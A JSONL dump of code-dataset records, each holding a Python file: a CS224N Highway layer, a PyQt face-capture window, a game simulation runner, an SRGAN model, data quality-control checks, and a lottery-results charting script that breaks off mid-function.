+{"seq_id":"573698809","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCS224N 2018-19: Homework 5\n\"\"\"\n\n### YOUR CODE HERE for part 1h\nimport torch\n\nclass Highway(torch.nn.Module):\n def __init__(self,dim):\n \"\"\"\n 初始化一个highway模块\n @param dim(int) : feature map大小,在此网络中输出和输入具有同样大小\n \"\"\"\n\n super(Highway,self).__init__()\n self.shortcut = torch.nn.Linear(dim,dim)\n self.mainroad = torch.nn.Linear(dim,dim)\n self.relu = torch.nn.ReLU()\n self.sigmoid = torch.nn.Sigmoid()\n\n def forward(self,x):\n \"\"\"\n highway正传播\n @param x 卷积网络输出x_conv,张量,维度为(batch_size,dim)\n @returns x_highway 张量,维度为(batch_size,dim)\n \"\"\"\n x_proj = self.shortcut(x)\n x_proj = self.relu(x_proj)\n x_gate = self.mainroad(x)\n x_gate = self.sigmoid(x_gate)\n x_highway = torch.mul(x_proj,x_gate) + torch.mul((1 - x_gate),x)\n\n return x_highway\n\n### END YOUR CODE \n\nif __name__ == \"__main__\":\n print('[INFO] 测试Highway模块...')\n batch_size = 3\n dim = 5\n net = Highway(dim)\n x = torch.randn(batch_size,dim)\n output = net.forward(x)\n \n assert (output.size() == (batch_size,dim)),f\"输出张量大小应该为{(batch_size,dim)},而得到的张量大小为{output.size()}\"\n print('[INFO] 测试通过!')","sub_path":"a5_public/highway.py","file_name":"highway.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"256186055","text":"# -*- coding:utf-8 -*-\nimport cv2\nimport numpy as np\nimport datetime\n\nfrom PyQt4 import QtGui, QtCore, uic\nfrom video_screen import VideoScreen\n\nfrom img_process import DetectFace\n\nclass CaptureWindow(QtGui.QMainWindow):\n DEFAULT_FPS = 30\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.ui = uic.loadUi('main_window.ui')\n self.stream = cv2.VideoCapture(0)\n\n #nothing\n self.stream.set(1, self.ui.inputCamStream.size().width())\n self.stream.set(1, self.ui.inputCamStream.size().height())\n\n self.videoScreen = VideoScreen(self, self.ui.inputCamStream)\n self.outputScreen = VideoScreen(self, self.ui.outputCanvas)\n\n #button click\n self.ui.keepCapturingCheckBox.stateChanged.connect(self.keepCapturingClicked)\n self.ui.getImageButton.clicked.connect(self.showImage)\n\n self.timer = QtCore.QTimer(self)\n self.timer.timeout.connect(self.queryFrame)\n\n fps = self.stream.get(cv2.CAP_PROP_FPS)\n\n if not fps >= 0: fps = self.DEFAULT_FPS\n self.timer.setInterval(1000 / fps)\n self.timer.start()\n self.ui.show()\n\n def process(self):\n self.videoScreen.onNewFrame(self.frame)\n\n @QtCore.pyqtSlot()\n def queryFrame(self):\n ret, self.frame = self.stream.read()\n self.frame=self.frame[:,79:559]\n if not ret: return\n self.process()\n\n\n @QtCore.pyqtSlot()\n def keepCapturingClicked(self):\n if (self.ui.keepCapturingCheckBox.isChecked()):\n self.timer.start()\n else:\n self.timer.stop()\n @QtCore.pyqtSlot()\n def showImage(self):\n face=DetectFace(self.frame)\n show_face=face.drawFaces() \n self.outputScreen.onNewFrame(show_face)\n\n","sub_path":"main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"592383069","text":"from __future__ import division, print_function\nimport sys, math, numpy as np, networkx as nx\nfrom random import uniform, choice\nfrom pyGoS import Simulation\nfrom pyGoS import random_regular_graph\nfrom pyGoS import accumulated_payoff\nfrom pyGoS import selection_probability\nfrom pyGoS import mutation\n\ndef run_simulation(**kwargs):\n N = kwargs.get('N')\n sims = kwargs.get('sims')\n gens = kwargs.get('gens')\n prefix = kwargs.get('prefix')\n\n gos = np.zeros((N+1, gens+1))\n num = np.zeros((N+1, gens+1), dtype='int')\n\n for _ in range(1,sims+1):\n\n s = Simulation(initnet=random_regular_graph,\n payoff=accumulated_payoff,\n probability=selection_probability,\n postupdate=mutation,\n #init_c=500,\n N=N, k=4,\n weak_pd=False, b=1.01, beta=10, m=0)\n gos[s.j, s.t] += s.gos()\n num[s.j, s.t] += 1\n print('%d sim, %d step %d coop'%(_, s.t, s.j))\n for i in range(gens):\n s.gen()\n gos[s.j, s.t] += s.gos()\n num[s.j, s.t] += 1\n print('%d sim, %d step %d coop'%(_, s.t, s.j))\n\n hdr = ','.join(['j']+['Gen %d'%t\n for t in range(gens+1)])\n gos = zip(range(N+1), *zip(*gos.tolist()))\n goscsv = '\\n'.join(map(lambda l: ','.join(map(str, l)), gos))\n num = zip(range(N+1), *zip(*num.tolist()))\n numcsv = '\\n'.join(map(lambda l: ','.join(map(str, l)), num))\n\n prefix = kwargs.get('prefix')\n with open(prefix+'.gossum.csv', 'w') as fp:\n fp.write(hdr+'\\n'+goscsv)\n with open(prefix+'.gosnum.csv', 'w') as fp:\n fp.write(hdr+'\\n'+numcsv)\n\nif __name__ == '__main__':\n prefix = sys.argv[1]\n run_simulation(N=1000, sims=1500, gens=100, prefix=prefix)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"241694031","text":"# -*- coding: utf-8 -*-\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport math\nimport torch\nif torch.__version__ >= '1.8':\n import torch_npu\nfrom torch import nn\n\n\nclass Generator(nn.Module):\n def __init__(self, scale_factor):\n upsample_block_num = int(math.log(scale_factor, 2))\n\n super(Generator, self).__init__()\n # self.block1 = nn.Sequential(\n # nn.Conv2d(3, 64, kernel_size=9, padding=4),\n # nn.PReLU()\n # )\n self.block0 = nn.Conv2d(3, 64, kernel_size=9, padding=4)\n self.block1 = nn.PReLU()\n self.block2 = ResidualBlock(64)\n self.block3 = ResidualBlock(64)\n self.block4 = ResidualBlock(64)\n self.block5 = ResidualBlock(64)\n self.block6 = ResidualBlock(64)\n self.block7 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.BatchNorm2d(64)\n )\n block8 = [UpsampleBLock(64, 2) for _ in range(upsample_block_num)]\n block8.append(nn.Conv2d(64, 3, kernel_size=9, padding=4))\n self.block8 = nn.Sequential(*block8)\n\n def forward(self, x):\n # block1 = self.block1(x)\n block0 = self.block0(x)\n block1 = self.block1(torch_npu.npu_format_cast(block0, 2))\n block2 = self.block2(block1)\n block3 = self.block3(block2)\n block4 = self.block4(block3)\n block5 = self.block5(block4)\n block6 = self.block6(block5)\n block7 = self.block7(block6)\n block8 = self.block8(block1 + block7)\n\n return (torch.tanh(block8) + 1) / 2\n\n\nclass Discriminator(nn.Module):\n def __init__(self):\n super(Discriminator, self).__init__()\n self.net = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, padding=1),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(64, 64, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(64, 128, kernel_size=3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(128, 128, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(128, 256, kernel_size=3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(256, 256, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(256, 512, kernel_size=3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.2),\n\n nn.Conv2d(512, 512, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.2),\n\n nn.AdaptiveAvgPool2d(1),\n nn.Conv2d(512, 1024, kernel_size=1),\n # nn.BatchNorm2d(1024),\n nn.LeakyReLU(0.2),\n nn.Conv2d(1024, 1, kernel_size=1)\n )\n\n def forward(self, x):\n batch_size = x.size(0)\n return torch.sigmoid(self.net(x).view(batch_size))\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, channels):\n super(ResidualBlock, self).__init__()\n self.conv1 = nn.Conv2d(channels, channels, kernel_size=3, padding=1)\n self.bn1 = nn.BatchNorm2d(channels)\n self.prelu = nn.PReLU()\n self.conv2 = nn.Conv2d(channels, channels, kernel_size=3, padding=1)\n self.bn2 = nn.BatchNorm2d(channels)\n\n def forward(self, x):\n residual = self.conv1(x)\n residual = self.bn1(residual)\n # residual = self.prelu(residual)\n residual = self.prelu(torch_npu.npu_format_cast(residual, 2))\n residual = self.conv2(residual)\n residual = self.bn2(residual)\n\n return x + residual\n\n\nclass UpsampleBLock(nn.Module):\n def __init__(self, in_channels, up_scale):\n super(UpsampleBLock, self).__init__()\n self.conv = nn.Conv2d(in_channels, in_channels * up_scale ** 2, kernel_size=3, padding=1)\n self.pixel_shuffle = nn.PixelShuffle(up_scale)\n self.prelu = nn.PReLU()\n\n def forward(self, x):\n x = self.conv(x)\n x = self.pixel_shuffle(x)\n # x = self.prelu(x)\n x = self.prelu(torch_npu.npu_format_cast(x, 2))\n return x\n\nif __name__ == '__main__':\n NetG = Generator(4)\n print(NetG)\n # print('----------------------------------------------------------------------------------------')\n # NetD = Discriminator()\n # print(NetD)\n","sub_path":"PyTorch/contrib/cv/others/SRGAN/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"248523094","text":"def persist_test(value,max_diff,min_stddev):\n '''\n Checks to see if there are repeat values in the data\n '''\n #Create a dataframe to store the values\n columns = ['date','value','max_diff','max_diff_result',\n 'min_stddev', 'min_stddev_result', 'result']\n df = pd.DataFrame(index=value.index, columns = columns)\n\n #Create a column to detail the date\n df['date'] = [(str(t.year)+ '-' + str(t.month) +'-' + str(t.day)) \\\n for t in df.index]\n df['value'] = value\n df['max_diff'] = max_diff\n df['min_stddev'] = min_stddev\n\n #Use lambda functions to calculate differences\n max_diff_f = lambda x: np.less_equal((x.max() - x.min()), max_diff)\n min_stddev_f = lambda x: np.greater_equal(x.std(), min_stddev)\n final_f = lambda x: np.logical_and(max_diff_f(x), min_stddev_f(x))\n\n #Group together by date\n grouped = df.groupby('date')\n md = grouped['value'].apply(max_diff_f)\n ms = grouped['value'].apply(min_stddev_f)\n pt = grouped['value'].apply(final_f)\n\n df['max_diff_result'] = True\n df['max_diff_result'] = df.apply(lambda row: _passed(row['date'], md), axis = 1)\n\n df['min_stddev_result'] = True\n df['min_stddev_result'] = df.apply(lambda row: _passed(row['date'], ms), axis = 1)\n\n df['result'] = df.apply(lambda row: _passed(row['date'], pt), axis =1)\n\n return df\n\ndef pre_range_test1(value, max_value, min_value):\n try:\n df = pd.DataFrame(index = value.index, columns = ['value', 'max_value', 'min_value', 'result'])\n df['value'] = value\n df['max_value'] = max_value\n df['min_value'] = min_value\n\n l = np.less_equal(value, max_value)\n g = np.greater_equal(value, min_value)\n\n df['result'] = np.logical_and(l,g)\n except Exception as e:\n sys.stderr.write(str(e) + '\\n')\n df = False\n\n return df\n\ndef test(value, max_value, min_value):\n #Checks to see if test function parameters are floats or integers\n _iif = lambda x: isinstance(x, (int,float))\n\n try:\n if isinstance(value,pd.Series):\n result = _pdtest(value, max_value, min_value)\n elif (_iif(value)) and (_iif(max_value)) and (_iif(min_value)):\n if value >= min_value and value <= max_value:\n result = True\n\n except Exception as e:\n sys.stderr.write(str(e) + '\\n')\n\n return result\n\ndef range_test(value, max_value, min_value):\n return(test(value, max_value, min_value))\n\ndef step_test(value,max_diff,num_steps=1):\n try:\n columns = ['value', 'prev_value', 'max_diff', 'num_steps', 'result']\n df = pd.DataFrame(index = value.index, columns = columns)\n prev_value = value[1:]\n df['value'] = value[:-1]\n df['prev_value'] = prev_value\n df['max_diff'] = max_diff\n df['num_steps'] = num_steps\n\n value = value[:-1]\n d = value - prev_value\n a = np.fabs(d)\n\n df['result'] = np.less_equal(a, max_diff)\n except:\n df = False\n return df\n","sub_path":"qa_qc_tests.py","file_name":"qa_qc_tests.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"394600353","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nfrom collections import namedtuple, OrderedDict\nimport csv\nimport datetime\nimport itertools\nimport matplotlib.pyplot as plt\nfrom operator import itemgetter\nimport os.path\nimport string\nimport sys\nimport logging\n\n# ----- Constants ------\n\n(MON, TUE, WED, THU, FRI, SAT, SUN) = range(7) # same as datetime.weekday()\nDAY_COMBINATIONS = ((SAT,), (MON,), (TUE,), (WED,),\n (SAT, MON), (SAT, TUE), (SAT, WED), (MON, TUE), (TUE, WED),\n (MON, WED))\nDAY_STRINGS = {MON: 'Mon', TUE: 'Tue', WED: 'Wed', THU: 'Thu', FRI: 'Fri',\n SAT: 'Sat', SUN: 'Sun'}\nWHITE = '#FFFFFE'\nGOLD = '#FFFF00'\nBLUE = '#66CCFF'\nPINK = '#FF6FCF'\nGREEN = '#66FF66'\n\n\n# ------ Classes -------\n\nclass Draw(namedtuple('Draw', 'draw_num date numbers lowest highest')):\n \"\"\"A sequence of integers identified by a date and draw number.\"\"\"\n pass\n\n\nclass DrawChart(object):\n \"\"\"A chart containing Draws with formatting information.\"\"\"\n DRAWN_STR = '•'\n NOT_DRAWN_STR = ''\n TEXT_COLS = 2 # date and filename\n TALLY_COLORS = OrderedDict([[GOLD, 'Gold'], [BLUE, 'Blue'], [PINK, 'Pink'],\n [GREEN, 'Green']])\n # Each rule tuple contains required cells with the previous cell at\n # position 0, earlier cells at higher indexes.\n # i.e. row -1 -2 -3 -4\n COLOR_RULES = OrderedDict([[(True, True), GREEN],\n [(False, False, True), PINK],\n [(False, True), BLUE],\n [(True, ), GOLD]])\n HEADER_HEIGHT = 1\n FOOTER_HEIGHT = 1 + len(COLOR_RULES) # draw percentages + color tallies\n\n def __init__(self, results, num_range):\n self.results = results\n self.draws = tuple(itertools.chain(*self.results.values()))\n self.lowest, self.highest = num_range\n (self.header, self.body, self.colors, self.footer, self.width,\n self.height) = self.process()\n\n def process(self):\n \"\"\"Create chart from draws in self.results.\"\"\"\n header = self.create_header()\n body = self.create_matrix()\n colors = self.create_color_matrix(body)\n footer = self.create_footer(colors)\n width = len(body[0])\n height = len(header) + len(body) + len(footer)\n return (header, body, colors, footer, width, height)\n\n def create_header(self):\n \"\"\"Return the header rows for this chart.\"\"\"\n return [['Date', 'File'] + list(range(self.lowest, self.highest + 1))]\n\n def create_matrix(self):\n \"\"\"Return matrix of processed draw information.\"\"\"\n matrix = []\n for fn, draws in self.results.items():\n for draw in draws:\n row = [draw.date, fn]\n row.extend([num in draw.numbers for\n num in range(self.lowest, self.highest + 1)])\n matrix.append(row)\n\n # Sort by date, then filename within date.\n date_col, file_col = 0, 1\n matrix.sort(key=itemgetter(date_col, file_col))\n return matrix\n\n def create_footer(self, colors):\n \"\"\"Return footer rows for this chart.\"\"\"\n return [self.draw_percentages_row()] + self.tallies_footer(colors)\n\n def draw_percentages_row(self):\n \"\"\"Return the draw percentages row for this chart.\"\"\"\n pcts = [self.calc_draw_percentage(n) for\n n in range(self.lowest, self.highest + 1)]\n return list(itertools.chain(['', 'Draw %'], pcts))\n\n def calc_draw_percentage(self, n):\n \"\"\"Return the draw percentage for number n.\"\"\"\n opps = len(self.draws)\n if opps == 0:\n return '' # number not in play (division by zero)\n times_drawn = sum((draw.numbers.count(n) for draw in self.draws))\n return '{:.4f}%'.format(times_drawn / opps)\n\n def tallies_footer(self, color_matrix):\n \"\"\"Return a 2D list of strings containing color counts by column.\"\"\"\n colors, names = zip(*self.TALLY_COLORS.items())\n tallies = [[''] * len(colors)] # column major order\n tallies.extend([names])\n transposed = list(zip(*color_matrix))\n for column in itertools.islice(transposed, self.TEXT_COLS, None):\n tallies.append([column.count(color) for color in colors])\n return list(zip(*tallies))\n\n def create_color_matrix(self, body):\n \"\"\"Create a matrix of colors according to predefined rules.\n\n Coloring rules:\n Each cell in the area of the matrix defined by start_row,\n start_col, and has_footer is colored depending on the cells in\n the same column in the rows above.\n\n Returns:\n 2D list of strings/None: A 2D list of the same dimensions as\n matrix, where each cell in the area defined by start_row,\n start_col, and has_footer is one of (None, GOLD, BLUE, PINK,\n GREEN).\n\n \"\"\"\n start_col = self.TEXT_COLS\n max_rule_length = max((len(rule) for rule in self.COLOR_RULES.keys()))\n width = len(body[0])\n height = len(body)\n transposed = list(zip(*body))\n colors = [[WHITE for row in range(height)] for\n col in range(width)] # column major order\n for row in range(height):\n for col in range(start_col, width):\n if not body[row][col]:\n continue # cell is empty\n fourth_previous = max(row - max_rule_length, 0)\n previous_cells = transposed[col][fourth_previous:row]\n previous_cells = tuple(reversed(previous_cells))\n colors[col][row] = self.calc_color(previous_cells,\n self.COLOR_RULES)\n colors = list(zip(*colors))\n # add header and footer rows\n colors = [[WHITE for col in range(width)] for\n row in range(self.HEADER_HEIGHT)] + colors\n colors += [[WHITE for col in range(width)] for\n row in range(self.FOOTER_HEIGHT)]\n return colors\n\n def calc_color(self, previous_cells, rules):\n \"\"\"Calculate the color for a given cell.\"\"\"\n for rule, color in rules.items():\n if len(previous_cells) < len(rule):\n continue\n for check_cell, correct_cell in zip(previous_cells, rule):\n if check_cell != correct_cell:\n break\n else:\n return color # found a match\n return WHITE\n\n def cell_text(self):\n \"\"\"Return 2D list of strings representing this chart.\"\"\"\n cells = []\n for row in self.body:\n row_text = row[:self.TEXT_COLS]\n row_text.extend([self.DRAWN_STR if cell else self.NOT_DRAWN_STR for\n cell in row[self.TEXT_COLS:]])\n cells.append(row_text)\n return self.header + cells + self.footer\n\n\nclass Reader(object):\n \"\"\"A reader for CSV files containing lottery data.\"\"\"\n DRAW_NUM_HEADING = 'Format: Draw Number'.lower()\n DATE_HEADING = 'Draw Date (yyyymmdd)'.lower()\n FIRST_NUM_HEADING = 'Winning Number 1'.lower()\n DELIMITERS = (',', ';', '\\t') # expected CSV delimiters\n MAX_DRAWN_NUMBERS = 9 # OzLotto has 7 + 2 supps\n\n def __init__(self, filenames, use_headings, abort_on_error, num_range):\n self.filenames = filenames\n self.use_headings = use_headings\n self.abort = abort_on_error\n self.num_range = num_range\n\n def read_files(self):\n \"\"\"Return a dictionary mapping filenames to lists of Draws.\"\"\"\n self.validate_filenames()\n results = {fn: self.read_file(fn) for fn in self.filenames}\n results = process_filenames(results)\n results = {fn: draws for fn, draws in results.items() if draws}\n if len(results) < 1:\n print('ERROR: No results found in input files.')\n sys.exit(1)\n return results\n\n def read_file(self, filename):\n \"\"\"Read a CSV file of Lotto Draws.\n\n Returns:\n list of Draws: Every Draw read from the input file.\n\n \"\"\"\n try:\n with open(filename, newline='') as f:\n dialect = csv.Sniffer().sniff(f.readline(), self.DELIMITERS)\n f.seek(0)\n csv_reader = csv.reader(f, dialect)\n headings_row = [h.strip() for h in csv_reader.__next__()]\n if self.use_headings:\n return self.read_by_headings(csv_reader, headings_row)\n return self.read_by_order(csv_reader)\n except IOError as err:\n print('ERROR: Cannot read from input file {}.'.format(filename))\n print(err)\n if self.abort:\n sys.exit(1)\n return None\n\n def read_by_headings(self, csv_reader, headings_row):\n \"\"\"Return a list of Draws read from csv_reader where column types\n are identified by the column's first cell.\"\"\"\n headings_lower = [h.strip().lower() for h in headings_row]\n draw_num_col = headings_lower.index(self.DRAW_NUM_HEADING)\n date_col = headings_lower.index(self.DATE_HEADING)\n first_num_col = headings_lower.index(self.FIRST_NUM_HEADING)\n return self.read_by_order(csv_reader, draw_num_col, date_col,\n first_num_col)\n\n def read_by_order(self, csv_reader, draw_num_col=0, date_col=1,\n first_num_col=2):\n \"\"\"Return a list of Draws read from csv_reader where column types\n are identified by index.\n\n Reads columns from first_num_col onward as drawn numbers until a\n cell containing anything other than an integer or hyphen is\n found or MAX_DRAWN_NUMBERS numbers have been read.\n\n Dates are expected to be in the format 'yyyymmdd'.\n\n \"\"\"\n lowest, highest = self.num_range\n draws = []\n for row in csv_reader:\n draw_num = int(row[draw_num_col])\n date = date_from_str(row[date_col])\n numbers = []\n last_col = min(self.MAX_DRAWN_NUMBERS + first_num_col, len(row))\n for cell in row[first_num_col:last_col]:\n if all((ch in string.digits for ch in cell)):\n numbers.append(int(cell))\n elif cell != '-': # numbers may be separated by hyphens\n break\n draws.append(Draw(draw_num, date, numbers, lowest, highest))\n return draws\n\n def validate_filenames(self):\n \"\"\"Check that each filename ends with the .csv extension.\"\"\"\n for fn in self.filenames:\n if len(fn) < 5 or not fn.lower().endswith('.csv'):\n print('ERROR: File {} missing .csv extension.'.format(fn))\n if self.abort:\n sys.exit(1)\n self.filenames.remove(fn)\n\n\nclass Writer(object):\n \"\"\"PNG Image writer for analysed lottery data.\"\"\"\n DATE_COL = 0\n FILE_COL = 1\n\n # matplotlib table formatting is poorly supported, so the\n # table dimensions were found by trial and error. These\n # dimensions look best when the draw draws from 45 numbers and\n # start to look unpresentable at around 50 numbers. The page width\n # was chosen to be close to a multiple of the width of an A4 sheet\n # of paper.\n # Unfortunately, text size cannot be predicted before rendering so\n # filenames that are too long must be truncated.\n DIMS = {'row_width': 16, # inches\n 'cell_height': 0.28,\n 'footer_height': 0.6,\n 'num_width': 0.29,\n 'date_width': 1.1,\n 'file_width': 1.3,\n 'max_filename': 23} # characters\n\n FONT_SIZES = {'default': 12.0, # points\n 'headings': 14.0,\n 'bullets': 24.0,\n 'draw_percentages': 10.0}\n\n FONT_WEIGHTS = {'text_headings': 'bold',\n 'num_headings': 'medium'}\n\n def __init__(self, chart, dpi):\n self.chart = chart\n self.dpi = dpi # image resolution in dots per inch\n\n def format(self, table):\n \"\"\"Format table for output to image file.\"\"\"\n self.truncate_filenames(table)\n rotate_footer_text(table, self.chart.FOOTER_HEIGHT)\n self.resize_table(table)\n self.format_text(table)\n\n def truncate_filenames(self, table):\n \"\"\"Truncate filenames that won't fit in the file column.\"\"\"\n for (_, col), cell in table.get_celld().items():\n if col == self.FILE_COL:\n text = cell.get_text()\n filename = text.get_text()\n shortened = filename[:self.DIMS['max_filename']]\n text.set_text(shortened)\n\n def resize_table(self, table):\n \"\"\"Resize the pyplot cells according to Writer cell\n dimensions.\"\"\"\n # Store width so we can restore table size after resizing cells,\n # in case the sum of dimensions in self.dims is not 1.0.\n initial_width = calc_table_width(table)\n\n for (row, col), cell in table.get_celld().items():\n self.resize_cell(cell, row, col)\n\n # Scale table width back to original value.\n final_width = calc_table_width(table)\n x_scale = initial_width / final_width\n table.scale(x_scale, 1.0)\n\n def resize_cell(self, cell, row, col):\n \"\"\"Resize a single cell.\"\"\"\n if row == self.chart.height - self.chart.FOOTER_HEIGHT:\n # first row of the footer (draw percentage)\n cell.set_height(self.DIMS['footer_height'])\n else:\n cell.set_height(self.DIMS['cell_height'])\n if col == self.DATE_COL:\n cell.set_width(self.DIMS['date_width'])\n elif col == self.FILE_COL:\n cell.set_width(self.DIMS['file_width'])\n else:\n cell.set_width(self.DIMS['num_width'])\n\n def format_text(self, table):\n \"\"\"Set font sizes and weights.\"\"\"\n table.auto_set_font_size(False)\n for (row, col), cell in table.get_celld().items():\n font_size, weight = self.cell_font_size_weight(row, col)\n text = cell.get_text()\n text.set_fontsize(font_size)\n text.set_weight(weight)\n\n def cell_font_size_weight(self, row, col):\n \"\"\"Return the font size and weight for the cell at (row, col)\n according to predetermined constants.\"\"\"\n is_heading = row == 0\n is_footer = row > self.chart.height - self.chart.FOOTER_HEIGHT\n is_text = col < self.chart.TEXT_COLS or is_footer\n is_draw_percentage = (row == self.chart.height -\n self.chart.FOOTER_HEIGHT and\n col >= self.chart.TEXT_COLS)\n font_size = None\n weight = None\n if is_heading:\n font_size = self.FONT_SIZES['headings']\n if is_text:\n weight = self.FONT_WEIGHTS['text_headings']\n else:\n weight = self.FONT_WEIGHTS['num_headings']\n elif is_draw_percentage:\n font_size = self.FONT_SIZES['draw_percentages']\n else:\n if is_text:\n font_size = self.FONT_SIZES['default']\n else:\n font_size = self.FONT_SIZES['bullets']\n return font_size, weight\n\n def write(self, filename):\n \"\"\"Write the results to a PNG image file.\"\"\"\n cell_text = self.chart.cell_text()\n\n # Create axes that take up the entire area and add a table.\n plt.figure(figsize=(self.DIMS['row_width'],\n self.DIMS['cell_height'] * 5))\n ax = plt.axes([0, 0, 1, 1])\n table = ax.table(cellText=cell_text,\n cellColours=self.chart.colors,\n cellLoc='center',\n loc='center')\n self.format(table)\n ax.axis('off') # hide the axes that come with every plot\n logging.debug('Saving {}...'.format(filename))\n plt.savefig(filename, dpi=self.dpi, bbox_inches='tight')\n plt.close('all')\n logging.debug('done.')\n\n\n# ----- Functions ------\n\ndef process_filenames(results):\n \"\"\"Process filenames for output.\n\n 1. '/path/to/filename.csv' -> 'filename'\n 2. 'OzLotto' (any case) -> 'Oz'\n 3. 'Tattslotto' (any case) -> 'Tattslotto'\n 4. 'MondayWednesdayLotto' -> 'Monday' and 'Wednesday'\n\n \"\"\"\n for old_fn, draws in list(results.items()):\n new_fn = strip_path_ext(old_fn)\n if new_fn.lower() == 'ozlotto':\n new_fn = 'Oz'\n elif new_fn.lower() == 'tattslotto':\n new_fn = 'Tattslotto'\n results[new_fn] = draws\n del results[old_fn]\n return separate_mon_wed(results)\n\n\ndef strip_path_ext(filename):\n \"\"\"Return a string containing the filename without path or\n extension.\"\"\"\n return os.path.splitext(os.path.basename(filename))[0]\n\n\ndef separate_mon_wed(results, mon_wed_fn='MondayWednesdayLotto'):\n \"\"\"Return results with values that were under key mon_wed_fn split\n between the two keys 'Monday' and 'Wednesday' depending on their\n date.\"\"\"\n draws = results.get(mon_wed_fn, None)\n if not draws:\n return results\n del results[mon_wed_fn]\n results['Monday'] = [d for d in draws if d.date.weekday() == MON]\n results['Wednesday'] = [d for d in draws if d.date.weekday() == WED]\n return results\n\n\ndef date_from_str(s):\n \"\"\"Return a date object from a string in the format 'yyyymmdd'.\"\"\"\n year = int(s[:4])\n month = int(s[4:6])\n day = int(s[6:])\n return datetime.date(year, month, day)\n\n\ndef last_date(results):\n \"\"\"Return the timedate.Date for the latest date in results.\"\"\"\n draws = tuple(itertools.chain(*results.values()))\n if not draws:\n return None\n return max(draws, key=lambda d: d.date).date\n\n\ndef calc_table_width(table):\n \"\"\"Return the width of matplotlib table in inches.\"\"\"\n return sum((cell.get_width() for cell in table.get_celld().values()))\n\n\ndef rotate_footer_text(table, n, start_col=2):\n \"\"\"Rotate the text in the -nth row of the table clockwise 90 degrees.\n\n Args:\n table (matplotlib table)\n\n \"\"\"\n row_num = sorted({row for (row, _) in table.get_celld().keys()})[-n]\n cells = (cell for (row, col), cell in table.get_celld().items() if\n row == row_num and col >= start_col)\n for cell in cells:\n text = cell.get_text()\n text.set_rotation(270)\n\n\ndef generate_filename(days, last_date, ext='.png'):\n \"\"\"Return a unique image filename for these days and date.\"\"\"\n first_day = SAT # starting day of the week for sorting\n sorted_days = sorted(days, key=lambda d: (d - first_day) % 7)\n days_str = '_'.join((DAY_STRINGS[day] for day in sorted_days))\n date_str = str(last_date).replace('-', '_')\n filename = '_'.join((date_str, days_str))\n return ''.join((filename, ext))\n\n\ndef filter_by_weekdays(results, days):\n \"\"\"Return results with only the draws that fall on a day in days.\"\"\"\n filtered = {fn: [draw for draw in draws if draw.date.weekday() in days] for\n fn, draws in results.items()}\n days_found = set()\n for draws in filtered.values():\n days_found.update({d.date.weekday() for d in draws})\n if len(days_found) < len(days):\n return {} # these entries will be covered by another days tuple\n return filtered\n\n\ndef filter_by_cutoff_date(results, weeks):\n \"\"\"Return results with only the draws from after (last draw - weeks).\"\"\"\n if results == {}:\n return {}\n cutoff = last_date(results) - datetime.timedelta(weeks=weeks)\n return {fn: [draw for draw in draws if draw.date > cutoff] for\n fn, draws in results.items()}\n\n\ndef filter_results(results, days, weeks):\n \"\"\"Return results with only the draws within the last \"weeks\" weeks\n that land on a day in days.\n\n Returns:\n dict (str: list of Draws): results filtered by days and weeks.\n\n \"\"\"\n filtered = filter_by_weekdays(results, days)\n filtered = filter_by_cutoff_date(filtered, weeks)\n return {fn: draws for fn, draws in filtered.items() if draws}\n\n\ndef parse_args():\n \"\"\"Parse arguments and perform simple validation.\"\"\"\n parser = argparse.ArgumentParser()\n parser.description = ('Process and chart lottery data. '\n 'Requires matplotlib.')\n parser.add_argument('inputfiles', nargs='+',\n help='CSV file(s) to process')\n parser.add_argument('-a', '--abort-on-error', action='store_true',\n help='exit if an input file cannot be read')\n parser.add_argument('-u', '--use-headings', action='store_true',\n help='read CSV columns by their headings '\n 'rather than their order')\n parser.add_argument('-n', '--number-range', type=int, nargs=2,\n default=[1, 45], metavar=('LOW', 'HIGH'),\n help='the range (inclusive) of numbers that '\n 'may be drawn (default is 1 45)')\n parser.add_argument('-r', '--resolution', type=int, default=120,\n metavar='DPI',\n help='output resolution in dots per inch '\n '(default is 120)')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='show progress as files are created')\n parser.add_argument('-w', '--weeks', type=int, default=104,\n help='number of weeks to process from last '\n 'date in inputfiles (default is 104)')\n\n # 